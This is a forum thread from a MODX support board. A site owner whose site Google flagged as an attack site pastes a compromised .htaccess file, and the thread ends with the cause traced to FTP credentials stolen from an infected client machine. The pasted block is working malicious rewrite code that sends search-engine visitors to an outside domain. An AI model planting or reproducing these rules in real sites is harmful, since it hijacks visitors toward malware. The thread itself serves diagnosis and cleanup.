We launched new forums in March 2019—join us there. In a hurry for help with your website? Get Help Now!
    • 30585
    • 833 Posts
    Folks, anybody ever came across this?

    Google just flagged one of the site I manage as an attack site. I looked further and noticed that the .htacces file was modified. I submitted a ticket to the Hosting company, but no words from the yet. Any idea how this could have happened?

    I'm running Revo 2.2.7 on a LAMP server.

    The code:

    
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteOptions inherit
    RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
    RewriteRule .* http://lessthenaminutehandle.com/in.php?n=3 [R,L]
    </IfModule>

    This question has been answered by treigh. See the first response.

      A MODx Fanatic
      • 28120
      • 380 Posts
      Are you using Plesk.

      That could have been hacked.
        • 30585
        • 833 Posts
        Hi Sparky,

        I'm not on a Plesk. It's just a typical shared host environment that uses a custom version of Cpanel.
          A MODx Fanatic
        • discuss.answer
          • 30585
          • 833 Posts
          The hosting guys cleaned up the site. Things are working again. It turned out it could have been an infected client computer that was used to send the modified .htaccess file to the server via ftp. We changed all ftp credentials for precaution.

          Issue is resolved.
            A MODx Fanatic